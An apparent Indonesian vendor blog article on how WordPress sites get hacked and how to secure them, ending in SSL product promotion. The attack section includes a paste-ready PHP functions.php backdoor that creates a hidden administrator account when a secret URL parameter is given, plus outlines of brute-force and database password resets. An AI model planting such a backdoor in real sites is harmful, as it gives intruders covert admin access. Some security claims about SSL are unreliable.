Bagaimana cara meretas WordPress?

Intro

Sebelum memulai artikel ini, kami ingin Anda tahu bahwa peretasan adalah ilegal, dan kami tidak memotivasi atau mendorong aktivitas jahat apa pun. Artikel ini semata-mata untuk mendapatkan pengetahuan tentang cara kerja penipu dan bagaimana beragam metode keamanan situs sangat penting untuk mencegah mereka. Mari kita bahas:

• Bagaimana cara penipu meretas WordPress?
• Bagaimana cara mengamankan situs WP Anda dari penipu?

Jadi, tanpa basa-basi lagi, mari kita mulai membahas topik ini.

Bagaimana Cara Meretas Situs Web WordPress Online?

(Sumber: wpsecurityninja.com)

Menggunakan WPScan:

WPScan adalah pemindai keamanan WP yang membantu pemilik situs untuk memeriksa kerentanan situs WordPress mereka, tetapi pemindai ini juga digunakan oleh peretas untuk memenuhi motif mereka untuk meretas situs web.

WPScan mengizinkan pemilik dan administrator situs untuk menentukan akun pengguna WP dan kata sandi brute force dan merupakan langkah terdepan dalam mendapatkan akses tidak sah ke akun WP.

(Nama pengguna dan kata sandi yang dipaksakan menggunakan WPScan. Sumber: Medium)

Serangan MIM:

Serangan Man-in-middle (MIM) dapat dengan mudah dilakukan dalam kasus pengguna yang menggunakan LAN yang sama. Login pengguna yang tidak terenkripsi adalah target yang lunak karena semua rinciannya terlihat dalam teks biasa.

Perangkat lunak yang terlibat dalam melakukan jenis serangan ini dapat menemukan tema yang dikompromikan, plugin, dan dapat menghitung pengguna.

(Sumber: Medium)

SQL Injections:

Serangan injeksi SQL dianggap sebagai serangan yang paling menonjol yang digunakan untuk menembus situs web. Serangan-serangan ini menargetkan gerbang backend dari situs web dan mengizinkan peretas untuk menembusnya dengan menerapkan perintah yang disusupi.

(Sumber: secure.wphackedhelp.com)

Penetrasi ini juga mengizinkan peretas untuk memodifikasi database dan perintah serta menghapus atau mencuri informasi situs.

Karena serangan SQL ini menemukan situs-situs yang rentan dan belum ditambal, mereka membuat tugas peretasan menjadi mudah dan berhasil.

Memanfaatkan My SQL / panel:

Dalam metode ini, peretas membuat akun palsu atau memodifikasi kata sandi pengguna situs WP saat ini. Peretas mencoba menembus melalui cPanel dengan membuka PhpMyAdmin. Mereka mencari tabel yang berakhiran _users dan menemukan pengguna yang ingin mereka modifikasi.

Ini akan memungkinkan mereka untuk mengubah kredensial pengguna yang mereka rencanakan untuk diretas. Mereka melacak pengguna dan mengubah kata sandi pengguna (dari bidang user_pass) dengan membuka generator MD5 online, dan mengganti kata sandi yang sama dengan kata sandi yang mereka inginkan, dan kemudian mengklik #.

(Nama pengguna, kata sandi hash pengguna, ID email mereka, dll. Semuanya disimpan di tabel database wp_users. Sumber: firstsiteguide.com)

Nama pengguna, kata sandi hash pengguna, ID email mereka, dll. Semuanya disimpan di tabel database wp_users.

Mengedit Functions.php:

Peretas juga mengakses cPanel untuk memodifikasi file Functions.php. Dengan membuka kunci File Manager, mereka mencari folder tema yang aktif. Dari folder public_html/wp_content/themes, mereka melacak tema tersebut dan mengedit functions.php dengan menempatkan kode yang telah dikompromikan. Peretasan sudah dalam proses karena akun baru telah dibuat oleh para peretas. Setelah selesai, mereka menghapus kode yang disusupi.

Buat Akun Pengguna Baru melalui FTP:

Umumnya, akun FTP membantu pemilik situs untuk membuat direktori dalam situs mereka yang mengizinkan pengguna tertentu untuk mengunggah/mengunduh file mereka menggunakan kredensial login mereka.

File-file ini juga dilihat di internet.

Langkah-langkah untuk Membuat Akun FTP di Situs:

• Masukkan data yang diinginkan
• Masukkan nama pengguna pengguna FTP baru
• Masukkan kata sandi untuk mengalokasikan akun untuk akses melalui FTP
• Masukkan nama direktori untuk memberikan akses melalui FTP
• Tulis ruang MB yang diinginkan yang ingin Anda alokasikan ke folder ini
• Kemudian tekan tombol "Create" untuk membuat akun baru.

Data yang disebutkan di bawah ini harus dimuat oleh pengguna baru untuk mendapatkan akses melalui FTP.

Alamat / Host Name / Address: yourdomain.com atau ftp.yourdomain.com Pengguna / User: [email protected] Kata sandi: Kata sandi El yang ditetapkan untuk akun FTP ini

Port: 21Beri nama folder untuk mengunggah/mengunduh file.

Pengguna baru akan memiliki izin baca dan tulis baik pada direktori yang dipilih maupun pada semua subdirektori yang dikandungnya. Misalnya, jika Anda membuat pengguna klien dan memberinya akses ke / home / user / public_html

Menembus melalui Backdoor:

Cara jahat untuk menembus situs adalah melalui backdoor. Baik itu penipu yang ingin mendapatkan akses ke situs Anda, atau pengguna korban, yang ingin mendapatkan kembali akses ke situs mereka melalui entri backdoor, mereka berdua harus mengikuti langkah-langkah di bawah ini.

Dalam kasus-kasus, ketika akun pengguna baru dibuat melalui FTP atau pengaturan ulang kata sandi dilakukan, tetapi tidak memberikan hasil yang diinginkan, pengguna mungkin ingin meretas situs mereka melalui entri backdoor dan mengambil akses admin mereka.

Langkah-langkah untuk Membuat Backdoor:

• Buka file functions.php dan tempelkan kode yang disebutkan di bawah ini.

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

• Kemudian simpan perubahan.

Crypto Jacking & Penambangan Cryptocurrency:

Popularitas mata uang kripto telah memunculkan ancaman siber baru seperti crypto-jacking, yang juga disebut malware penambangan mata uang kripto.

Tindakan menyita komputer yang bertentangan dengan keinginan serta kesadaran pengguna disebut crypto-jacking. Dalam malware crypto-jacking, para penipu menginfeksi komputer pengguna dengan malware berbahaya yang dikirimkan melalui perangkat lunak untuk mengkompromikan sistem dan jaringan.

Phishing:

Phishing adalah metode di mana penipu menipu pengguna dari informasi sensitif mereka (kredensial login, nomor akun sosial, PIN, detail kartu kredit, dll.) dengan menyamar sebagai badan hukum. Mereka biasanya menggunakan email untuk memenuhi tujuan mereka.

Contoh: Penipu mungkin menyamar sebagai sumber yang dapat dipercaya dan mengumpulkan data pribadi dari pengguna untuk memenuhi keinginan mereka. Mereka juga mungkin menaruh tautan yang buruk dalam email phishing dan mengarahkan mereka ke beberapa situs penipuan untuk mengirimkan malware.

Malware:

Statistik Keamanan WordPress menunjukkan bahwa 4000 situs web WP terinfeksi malware karena plugin SEO palsu.

Penipu tidak memerlukan sumber untuk mengirimkan malware. Plugin SEO, tema WP, dan banyak faktor lain yang ada di situs telah memotivasi peretas untuk menggunakan malware WP-VCD baru-baru ini.

Bahkan email phishing adalah gerbang untuk mengirimkan malware.

Di sini juga, moto para peretas sama, yaitu, untuk mendapatkan data sensitif dari pengguna dengan menembus sistem dan mencuri informasi.

WordPress Ransomware:

Dalam ransomware WP, peretas menggunakan malware untuk memblokir akses pengguna ke sistem dan jaringan. Hal yang sama dapat dipulihkan oleh pengguna dengan membayar tebusan seperti yang diminta oleh peretas.

Contoh: Serangan Petya, di mana peretas mengenkripsi file dan data Anda dan menuntut tebusan terhadap kunci dekripsi.

Serangan Cross-Site Scripting (XSS):

Serangan XSS dilakukan oleh peretas dengan menyuntikkan konten berbahaya ke dalam situs web, sehingga mengeksploitasi browser. Serangan ini memungkinkan peretas untuk mencuri data dari cookie, memodifikasi konten situs, dan merebut situs web untuk mendapatkan data sensitif.

Clickjacking:

Dalam clickjacking, peretas melakukan upaya jahat untuk mengkompromikan tombol/tautan dan memotivasi pengguna untuk mengklik objek yang dikompromikan. Hal ini memungkinkan peretas untuk mengeksekusi perintah jahat untuk mendapatkan akses ke data sensitif pengguna.

Spoofing:

Spoofing adalah serangan di mana orang tersebut menyamar sebagai identitas yang dapat dipercaya untuk mendapatkan keuntungan ilegal pada pengguna dan menipu mereka untuk mengirimkan informasi rahasia mereka.

Untuk mencegah semua serangan peretasan ini, langkah-langkah keamanan khusus perlu diambil untuk mengamankan situs web WP Anda.

Bagaimana Cara Mengamankan Situs Web WordPress dari Peretasan?

(Sumber: envisagedigital.co.uk)

Statistik di atas cukup untuk menunjukkan popularitas WordPress. Popularitas inilah yang membuat platform CMS ini lebih diminati oleh para peretas, yang mencoba berbagai metode peretasan untuk mendapatkan akses ke situs web WP dan datanya.

Oleh karena itu, penting untuk mengetahui cara mencegah peretas mengakses situs WP Anda.

Amankan situs WP Anda dengan Sertifikat SSL:

Ketika data apa pun dimuat di situs, selalu dalam teks biasa yang mudah terlihat oleh semua orang termasuk peretas. Hal ini bisa berisiko karena peretas dapat menyalahgunakan data situs Anda.

Sertifikat SSL (Secure Socket Layers) adalah sertifikat digital yang membantu mengamankan situs WP Anda dengan keamanan enkripsi 256-bit, sehingga mengubah data situs Anda menjadi format kode.

Peretas tidak dapat membaca kode meskipun mereka telah mendapatkan akses ke situs Anda dan karenanya mereka terpaksa meninggalkan situs tersebut.

(Sumber: clickssl.net)

Pilih merek sertifikat SSL yang Anda inginkan (Comodo, Thawte, RapidSSL, dll.) Dan instal yang sama di situs WP Anda. Dalam hal jenis sertifikat SSL, Anda perlu memahami domain dan subdomain. Misalnya, jika situs WP Anda memiliki subdomain, maka, satu Sertifikat Wildcard murah dengan biaya hanya $ 45 / tahun kira-kira dapat mengamankan seluruh bisnis digital Anda.

Penerbitan cepat, enkripsi kunci 2048-bit, peningkatan SEO, segel kepercayaan situs, kompatibilitas browser/mobile 99%, kebijakan pengembalian dana, dan garansi adalah beberapa fitur dan manfaat dari menginstal sertifikat SSL Wildcard.

Beragam merek dan pilihan produk SSL, harga yang ramah anggaran, dan layanan pelanggan yang sangat baik adalah beberapa manfaat dari mendekati toko ClickSSL untuk mengamankan situs WP Anda.

Perbarui Karyawan Anda:

Kesalahan manusia bisa menjadi bencana, jadi selalu pastikan untuk selalu memperbarui karyawan Anda tentang ancaman siber terbaru untuk menghindari mereka dari kerentanan.

Jika karyawan Anda dapat melacak sinyal mencurigakan dari situs web yang diretas pada tahap awal, mereka dapat menginformasikan kepada yang bersangkutan dan mencegah situs dan bisnis Anda dari kerusakan lebih lanjut.

Gunakan Autentikasi Dua Faktor (2FA):

Menerapkan 2FA selama login situs adalah cara yang paling penting untuk menangkal serangan brute force. Selain menambahkan lapisan keamanan lain, mereka juga mencegah data situs dan pengguna.

Ini karena jika satu lapisan keamanan dikompromikan, penipu perlu menyerang lapisan kedua untuk mendapatkan akses ke situs web.

Ini adalah panggilan yang sulit dan karenanya dalam sebagian besar kasus, penipu akhirnya pindah ke situs lain yang keamanannya buruk.

Tip: WP 2FA adalah plugin WP gratis yang memberikan lapisan keamanan tambahan ke situs WP Anda.

Mengaudit Pengguna Admin Secara Teratur:

Ini penting untuk keamanan situs WP Anda. Pastikan untuk mengaudit pengguna admin Anda secara teratur dan memeriksa silang akses mereka.

Juga pastikan bahwa pengguna Anda, serta karyawan, memiliki akses terbatas sesuai tugas mereka, untuk mencegah penyimpangan keamanan.

Perbarui WordPress Core secara teratur:

Tidak tahu tentang WP Core?

Izinkan saya menjelaskan kepada Anda bahwa WP Core mencakup semua file dasar yang diperlukan agar WP dapat bekerja.

Daftar file dalam file zip WP yang diunduh dari WordPress.org

(Sumber: ithemes.com)

File-file inti ini perlu diperbarui secara teratur setelah rilis pembaruan keamanan, untuk menambal semua kerentanan keamanan.

Unduh Tema & Plugin WP dari Sumber Terpercaya:

Ini sangat penting karena plugin dapat mengancam ketika tidak diperbarui atau diinstal dari sumber yang tidak dapat dipercaya. Dalam hal menggunakan plugin gratis/berbayar, selalu periksa faktor-faktor yang disebutkan di bawah ini seperti:

• Peringkat & ulasan pengguna
• Keramahan pengguna
• Kompatibilitas
• Keamanan
• Dapat dipercaya

(Sumber: torquemag.io)

Aturan yang sama juga berlaku untuk menginstal tema WP.

Perbarui Tema & Plugin WP secara teratur:

Tema dan plugin WP yang sudah usang atau kedaluwarsa selalu menjadi ancaman bagi situs WP Anda karena mereka kehilangan standar keamanannya. Untuk mencegah peretas menggunakan gerbang semacam itu untuk menyebarkan malware untuk mendapatkan akses situs, pastikan untuk memperbarui tema dan plugin yang digunakan di situs WP Anda secara teratur.

Ini akan membantu plugin berfungsi dengan baik dan tetap sinkron dengan versi terbaru WP.

Tip: Pada halaman plugin, Anda dapat melihat semua plugin yang terinstal dan tautan yang menyatakan "Aktifkan pembaruan otomatis" di samping setiap plugin. Aktifkan untuk pembaruan otomatis.

Memodifikasi Nama Admin Default:

Peretas terlalu pintar, dan mereka dapat dengan mudah menembus situs WP Anda dengan menggunakan nama admin default. Selalu lebih disukai untuk memodifikasi nama pengguna admin default untuk mencegah peretas melakukan serangan brute-force untuk mendapatkan akses tidak sah ke situs web Anda.

Berikan Akses Terbatas:

Jangan pernah memberikan lebih dari yang diperlukan dan aturan yang sama berlaku untuk memberikan akses situs kepada pengguna serta karyawan.

Kontrol akses adalah aturan utama keamanan situs dan data karena menentukan siapa yang dapat atau tidak dapat mengakses situs web. Blokir semua pintu masuk ke admin WP dan kode dan data penting lainnya untuk keamanan situs.

Akses terbatas tidak hanya meningkatkan produktivitas, tetapi juga mengamankan situs Anda dari entri berbahaya.

Perbarui WordPress:

Ketika WordPress Anda tidak diperbarui, situs Anda berisiko diserang oleh peretas.

WordPress menguasai 37% pangsa pasar, dan terus merilis pembaruan secara teratur untuk memperbaiki lubang keamanan dan bug. Pembaruan-pembaruan ini juga mencakup fitur-fitur baru dan perbaikan dari yang sudah ada yang berguna untuk meningkatkan kinerja situs Anda.

(Sumber: wpbeginner.com)

Selalu perbarui situs WP Anda untuk keamanan yang kuat.

Penutupan:

Gunakan kata sandi yang kuat dan kompleks dan jaga agar situs WP Anda serta plugin dan tema diperbarui untuk memperbaiki semua penyimpangan keamanan. Luangkan waktu untuk mengedukasi karyawan Anda karena akan selalu membantu dalam mencegah bencana.

Jangan pernah lengah dalam hal keamanan dan selalu pastikan untuk menggunakan plugin keamanan terbaik dan tepercaya untuk menjaga situs WP Anda aman dari pengintaian. Selain itu, amankan situs Anda dengan SSL untuk meningkatkan kepercayaan pelanggan, bisnis, dan SEO.

Sekarang setelah Anda mengetahui bagaimana fungsi peretas, kami berharap artikel ini membantu Anda dalam mencegah peretas menembus situs Anda dan dalam mengelola situs WP Anda dengan cara yang aman.